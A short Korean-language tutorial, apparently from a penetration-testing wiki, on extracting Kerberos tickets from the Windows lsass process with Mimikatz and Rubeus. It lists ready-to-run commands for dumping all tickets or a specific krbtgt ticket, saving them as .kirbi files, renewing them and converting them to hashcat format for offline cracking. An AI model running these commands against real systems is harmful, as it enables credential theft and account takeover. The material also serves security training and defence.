Windows에서 티켓은 보안 정책을 처리하는 lsass (Local Security Authority Subsystem Service) 프로세스에 의해 관리되고 저장됩니다. 이러한 티켓을 추출하기 위해서는 lsass 프로세스와 상호 작용해야 합니다. 비 관리자 사용자는 자신의 티켓에만 액세스할 수 있지만 관리자는 시스템의 모든 티켓을 추출할 권한이 있습니다. 이러한 작업을 위해 Mimikatz와 Rubeus라는 도구가 널리 사용되며, 각각 다른 명령과 기능을 제공합니다.

Mimikatz

Mimikatz는 Windows 보안과 상호 작용할 수 있는 다재다능한 도구입니다. 티켓을 추출하는 것뿐만 아니라 다양한 보안 관련 작업에 사용됩니다.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus는 Kerberos 상호작용과 조작을 위해 특별히 개발된 도구입니다. 티켓 추출 및 처리뿐만 아니라 다른 Kerberos 관련 작업에 사용됩니다.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

이러한 명령을 사용할 때, <BASE64_TICKET>과 <luid>와 같은 자리 표시자를 실제로 Base64로 인코딩된 티켓과 로그온 ID로 대체해야 합니다. 이 도구들은 티켓을 관리하고 Windows의 보안 메커니즘과 상호 작용하는 데 광범위한 기능을 제공합니다.

참고 자료

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/